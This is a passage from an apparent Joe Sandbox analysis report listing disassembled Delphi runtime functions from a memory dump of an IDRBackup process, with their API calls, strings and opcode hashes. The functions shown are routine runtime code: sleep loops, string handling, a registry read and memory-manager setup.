                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$System@@$StringStringx20$Asg$qqrr20$Cat3$qqrr20LoadRaiseRecxiStringpx14Stringt2Sysutils@Text$qqrxusTypeVariants@$CharClassClassoCreate$qqrp17Error$qqrucExcept$qqrvException@$bctr$qqrx20FindFormat$qqrx20FromInstance$qqruiLen$qqrr20List$qqrvMetaResourceString$qqrp20Stringpbi
                                                                                                  • String ID:
                                                                                                  • API String ID: 2913030950-0
                                                                                                  • Opcode ID: 9e4588ab5fbf3776320f84b4910e65cdf9adfca07252c9cacba831bf2d20f2b7
                                                                                                  • Instruction ID: b206631945bac027483975cbfdcde3309e2ada628b630dd74d92ef405ac4078d
                                                                                                  • Opcode Fuzzy Hash: 9e4588ab5fbf3776320f84b4910e65cdf9adfca07252c9cacba831bf2d20f2b7
                                                                                                  • Instruction Fuzzy Hash: EC113074D0564A9FEB05CFA8EC519EEB7B5EF58300F50456AE904E3341D7745A01CAE1
                                                                                                  Function 50002594 Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • Sleep.KERNEL32(00000000), ref: 5000264B
                                                                                                  • Sleep.KERNEL32(0000000A,00000000), ref: 50002661
                                                                                                  • Sleep.KERNEL32(00000000), ref: 5000268F
                                                                                                  • Sleep.KERNEL32(0000000A,00000000), ref: 500026A5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Sleep
                                                                                                  • String ID:
                                                                                                  • API String ID: 3472027048-0
                                                                                                  • Opcode ID: 909da8435180447502b99cd17005e77f61d8cca13c779df2b902078bd9ee526c
                                                                                                  • Instruction ID: 5e3a079f800866a7a99d18f5d12456752269fdda2f1ebf4bbfd7b8be750778e6
                                                                                                  • Opcode Fuzzy Hash: 909da8435180447502b99cd17005e77f61d8cca13c779df2b902078bd9ee526c
                                                                                                  • Instruction Fuzzy Hash: 2DC16876605A908FF725CF68EDA0355BBE0EB91310F98C36ED9188B3D5C770A844CB82
                                                                                                  Function 50010530 Relevance: 9.0, APIs: 6, Instructions: 32COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Character@TCharacter@IsHighSurrogate$qqrb.RTL120 ref: 50010538
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120 ref: 50010553
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120 ref: 5001054E
                                                                                                    • Part of subcall function 500266E0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500266EA
                                                                                                    • Part of subcall function 500266E0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 500266FA
                                                                                                    • Part of subcall function 500266E0: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 50026705
                                                                                                  • @Character@TCharacter@IsLowSurrogate$qqrb.RTL120 ref: 5001055A
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120 ref: 50010570
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120 ref: 50010575
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$Character@$RaiseString$Except$qqrvException@$bctr$qqrp20Surrogate$qqrbSysutils@$AfterClassClassoConstruction$qqrp14Create$qqrp17Error$qqrucHighList$qqrvLoadMetaObjectString$qqrp20
                                                                                                  • String ID:
                                                                                                  • API String ID: 2248103522-0
                                                                                                  • Opcode ID: 573852c680a080bc0a97d15b87a50ebf7b650f53a3d381ad41dee1fe05933011
                                                                                                  • Instruction ID: d6cb0d2706df4e8aacf07fe5ab19d242fe700b88596e7abf658fbf432eafdb11
                                                                                                  • Opcode Fuzzy Hash: 573852c680a080bc0a97d15b87a50ebf7b650f53a3d381ad41dee1fe05933011
                                                                                                  • Instruction Fuzzy Hash: F5F0EC312014D107F7149BE8FD966A527E2DF542847008227FCC4C7313C55DCC459790
                                                                                                  Function 5002D28C Relevance: 9.0, APIs: 6, Instructions: 25COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D299
                                                                                                  • @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2AB
                                                                                                  • @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2BD
                                                                                                  • @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2CF
                                                                                                  • @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2E1
                                                                                                  • @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2F3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Free$qqrvObject@System@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1799115918-0
                                                                                                  • Opcode ID: 57d29681f9056ac9329a7d325797a05bd985a2fc8562293051953311b1bf6d3d
                                                                                                  • Instruction ID: 768d9f2a40722debd25e9cdb4e8e1545f006035ae00f2926f4075c138192a15b
                                                                                                  • Opcode Fuzzy Hash: 57d29681f9056ac9329a7d325797a05bd985a2fc8562293051953311b1bf6d3d
                                                                                                  • Instruction Fuzzy Hash: F7F0B2B46059444FF714DBBBAC9147576F7EFE8360385C519D0548B125DF36D441DB40
                                                                                                  Function 500146D8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 138COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Math@LnXP1$qqrxg.RTL120(?,?,?), ref: 50014737
                                                                                                  • @System@Ln$qqrxg.RTL120 ref: 500147D3
                                                                                                  • @System@Exp$qqrxg.RTL120 ref: 50014826
                                                                                                  • @System@Exp$qqrxg.RTL120(?,?,?), ref: 50014760
                                                                                                    • Part of subcall function 500123E4: @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(?,500145C0), ref: 500123F0
                                                                                                    • Part of subcall function 500123E4: @System@@RaiseExcept$qqrv.RTL120(?,500145C0), ref: 500123F5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Exp$qqrxg$Except$qqrvException@$bctr$qqrx20Ln$qqrxgMath@P1$qqrxgRaiseStringSystem@@Sysutils@Unicode
                                                                                                  • String ID: InternalRateOfReturn
                                                                                                  • API String ID: 309294142-2879142521
                                                                                                  • Opcode ID: 40dbb84fc3f4aabbfd560051f9dc9f7ee145eef59bad3b00fae40bf970de2026
                                                                                                  • Instruction ID: b61e661a85086c600ac26f88c2d9d293700b97cdbe0b4422f277c6d0116d9991
                                                                                                  • Opcode Fuzzy Hash: 40dbb84fc3f4aabbfd560051f9dc9f7ee145eef59bad3b00fae40bf970de2026
                                                                                                  • Instruction Fuzzy Hash: 69410960E091DA66CF516FF5DC504EEBFB4FF06900F104B5BE8E4A3162DA3289A0CB80
                                                                                                  Function 50023964 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 95COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@StrCharLength$qqrpxb.RTL120(?), ref: 500239DB
                                                                                                  • @Sysutils@StrNextChar$qqrpxb.RTL120 ref: 500239F5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Sysutils@$CharChar$qqrpxbLength$qqrpxbNext
                                                                                                  • String ID: H
                                                                                                  • API String ID: 4247032953-2852464175
                                                                                                  • Opcode ID: d4cd2c9e9290bb1fd43fec2215baa18dbef9c92e5702672488c2aa5db4bf2880
                                                                                                  • Instruction ID: e4e35325c6f34d9b65b87c66d780d8f477e977d8e87dd0103a07f57f46b7daee
                                                                                                  • Opcode Fuzzy Hash: d4cd2c9e9290bb1fd43fec2215baa18dbef9c92e5702672488c2aa5db4bf2880
                                                                                                  • Instruction Fuzzy Hash: 0731A53091658A8BDB10DFA8E8557EEB7F4EF05310F144226E844A76A2D3749E84C7A6
                                                                                                  Function 500069B4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 500069D6
                                                                                                  • RegQueryValueExW.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,50006A25,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 50006A09
                                                                                                  • RegCloseKey.ADVAPI32(?,50006A2C,00000000,?,00000004,00000000,50006A25,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 50006A1F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                  • API String ID: 3677997916-4173385793
                                                                                                  • Opcode ID: 9ee370e70f06ee6609448c8435f7d602838b41d496a2b7e5916629935dfd1a17
                                                                                                  • Instruction ID: 68fb37e24ddefeba98026e83a54610ce6f8a69bb8d0a75ef775160f2897bda80
                                                                                                  • Opcode Fuzzy Hash: 9ee370e70f06ee6609448c8435f7d602838b41d496a2b7e5916629935dfd1a17
                                                                                                  • Instruction Fuzzy Hash: 5A01F579A50248BAF710DBE19C62FF977ECEB09720F504666FA04E3580E6349900CA55
                                                                                                  Function 500117F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120 ref: 500117F5
                                                                                                  • @Character@TCharacter@Initialize$qqrv.RTL120 ref: 50011807
                                                                                                    • Part of subcall function 5001062C: FindResourceW.KERNEL32(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010640
                                                                                                    • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 5001064B
                                                                                                    • Part of subcall function 5001062C: LoadResource.KERNEL32(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010657
                                                                                                    • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010662
                                                                                                    • Part of subcall function 5001062C: LockResource.KERNEL32(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010668
                                                                                                    • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010674
                                                                                                  • @Character@TCharacter@IsAscii$qqrb.RTL120 ref: 50011849
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Character@$Error$qqrvLastRaiseResourceSysutils@$Ascii$qqrbFindInitialize$qqrvLatin1$qqrbLoadLock
                                                                                                  • String ID: A$Z
                                                                                                  • API String ID: 2801340237-4098844585
                                                                                                  • Opcode ID: 3d7b16622b306a41cb389fb1ff8cb04a695359a54526d75529cb678f32deca9d
                                                                                                  • Instruction ID: 8de0f1dd0d009ed91e586fc1ea9b6193379de2375c44f7f3be455893678d8cca
                                                                                                  • Opcode Fuzzy Hash: 3d7b16622b306a41cb389fb1ff8cb04a695359a54526d75529cb678f32deca9d
                                                                                                  • Instruction Fuzzy Hash: 5701D651B181910BE71C5A619C513E833D26794302B5C827EE856CB6E3DF38C5D5E220
                                                                                                  Function 50010A54 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120 ref: 50010A59
                                                                                                  • @Character@TCharacter@Initialize$qqrv.RTL120 ref: 50010A6B
                                                                                                    • Part of subcall function 5001062C: FindResourceW.KERNEL32(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010640
                                                                                                    • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 5001064B
                                                                                                    • Part of subcall function 5001062C: LoadResource.KERNEL32(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010657
                                                                                                    • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010662
                                                                                                    • Part of subcall function 5001062C: LockResource.KERNEL32(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010668
                                                                                                    • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010674
                                                                                                  • @Character@TCharacter@IsAscii$qqrb.RTL120 ref: 50010AAD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Character@$Error$qqrvLastRaiseResourceSysutils@$Ascii$qqrbFindInitialize$qqrvLatin1$qqrbLoadLock
                                                                                                  • String ID: a$z
                                                                                                  • API String ID: 2801340237-4151050625
                                                                                                  • Opcode ID: 68cc252f88e33736421a10eeeaa1cb58d10f880ea185927b8fcd1914d9384458
                                                                                                  • Instruction ID: 7fc53a10070eca12ef29afc55d4c6d512350c562e79b40b59943fefc8229aada
                                                                                                  • Opcode Fuzzy Hash: 68cc252f88e33736421a10eeeaa1cb58d10f880ea185927b8fcd1914d9384458
                                                                                                  • Instruction Fuzzy Hash: 3401F951B142D04BE7184B71AC512E937D2AB80302BC9417EF4C3CB697DBBD85D5E721
                                                                                                  Function 5002483C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,?,00000000,?,500249A4,?,00000000,50024C6D), ref: 5002485E
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?,?,?,00000000,?,500249A4,?,00000000,50024C6D), ref: 50024866
                                                                                                  • @Sysutils@AnsiStrPos$qqrpbt1.RTL120(?,?,?,00000000,?,500249A4,?,00000000,50024C6D), ref: 5002486C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Char$qqrx20StringSystem@System@@Unicode$AnsiPos$qqrpbt1Sysutils@
                                                                                                  • String ID: XlP$tlP
                                                                                                  • API String ID: 1532255607-7086264
                                                                                                  • Opcode ID: 991b3ea7feb4240ad0f450cbc532c132e9e449f5bec3a229383f214eb6be9b84
                                                                                                  • Instruction ID: 41cbf7802f78e1180780a1aded232e557ab5269dbb48a6fdf072be4a9a689297
                                                                                                  • Opcode Fuzzy Hash: 991b3ea7feb4240ad0f450cbc532c132e9e449f5bec3a229383f214eb6be9b84
                                                                                                  • Instruction Fuzzy Hash: ABF0A7A27161D69BE7509B68FC80B6E77E8DB55264F510A36EA88C7201DA35DC00C751
                                                                                                  Function 50003C30 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • MessageBoxA.USER32(00000000,50001F08,50001EE8,00002010), ref: 50003C85
                                                                                                    • Part of subcall function 50003BF0: OpenFileMappingA.KERNEL32(00000004,00000000,Local\FastMM_PID_????????), ref: 50003C00
                                                                                                  • @System@SetMemoryManager$qqrrx23System@TMemoryManagerEx.RTL120 ref: 50003C65
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MemorySystem@$FileManagerManager$qqrrx23MappingMessageOpen
                                                                                                  • String ID: <JP$jP
                                                                                                  • API String ID: 3588758399-1976356052
